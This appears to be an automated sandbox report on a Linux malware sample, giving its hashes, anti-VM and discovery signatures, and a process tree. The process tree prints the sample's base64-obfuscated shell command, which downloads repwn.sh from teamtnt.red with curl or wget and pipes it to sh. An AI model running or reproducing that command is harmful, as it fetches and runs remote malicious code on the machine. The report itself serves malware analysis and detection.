Overview

overview

10

Static

static

10

fdac214635...12003c

ubuntu-24.04-amd64

6

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    ubuntu-24.04_amd64
  • resource
    ubuntu2404-amd64-20240523-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system
  • submitted
    22-12-2024 00:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fdac214635e7de8f09f942c53dede7849fe15552099f794827cbac73c112003c

  • Size

    5.3MB

  • MD5

    e3850f7fa3eae086967759c893cbc50c

  • SHA1

    932d4668d6cc83b82878f50690ea09ac9e599932

  • SHA256

    fdac214635e7de8f09f942c53dede7849fe15552099f794827cbac73c112003c

  • SHA512

    86317f162894e5d29086464550b69ce14a6684e0037d789a8e14ceff86d6ff8a9ab2a722b725a13c1c375dceddc480ac9af46644ec5e428360e4ade877461473

  • SSDEEP

    98304:Bdf5TA6jvPzJ7FcwquNlcBsG8gmVp4sMxBIRdkYAqYw67b3kAOXNhR4TjzopoyNo:dA4D4c1P7OBx

Score
6/10
antivmdefense_evasiondiscovery

Malware Config

Signatures

  • Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

    Checks DMI information which indicate if the system is a virtual machine.

    antivm
  • Reads hardware information 1 TTPs 14 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

    discovery
  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Adversaries may deobfuscate or decode files or information to evade detection mechanisms.

    defense_evasion
  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads CPU attributes 1 TTPs 3 IoCs
    discovery
  • Enumerates kernel/hardware configuration 1 TTPs 60 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

    discovery
  • Reads runtime system information 5 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • cURL User-Agent 1 IoCs

    Uses User-Agent string associated with cURL utility.

Processes

  • /tmp/fdac214635e7de8f09f942c53dede7849fe15552099f794827cbac73c112003c
    /tmp/fdac214635e7de8f09f942c53dede7849fe15552099f794827cbac73c112003c
    1⤵
    • Checks hardware identifiers (DMI)
    • Reads hardware information
    • Checks CPU configuration
    • Reads CPU attributes
    • Enumerates kernel/hardware configuration
    • Reads runtime system information
    PID:2825
    • /bin/sh
      sh -c "echo aWYgdHlwZSBjdXJsIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsOyB0aGVuIGN1cmwgLXMgaHR0cDovL3RlYW10bnQucmVkL3JlcHduLnNoIHwgc2ggMj4vZGV2L251bGwgMT4vZGV2L251bGwKZWxpZiB0eXBlIHdnZXQgMj4vZGV2L251bGwgMT4vZGV2L251bGw7IHRoZW4gd2dldCAtcSAtTyAtIGh0dHA6Ly90ZWFtdG50LnJlZC9yZXB3bi5zaCB8IHNoIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsCmZpCg== | base64 -d | sh"
      2⤵
        PID:2827
        • /usr/bin/base64
          base64 -d
          3⤵
          • Deobfuscate/Decode Files or Information
          PID:2829
        • /usr/bin/sh
          sh
          3⤵
            PID:2830
            • /usr/bin/curl
              curl -s http://teamtnt.red/repwn.sh
              4⤵
              • Reads runtime system information
              PID:2831
            • /usr/bin/sh
              sh
              4⤵
                PID:2832

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads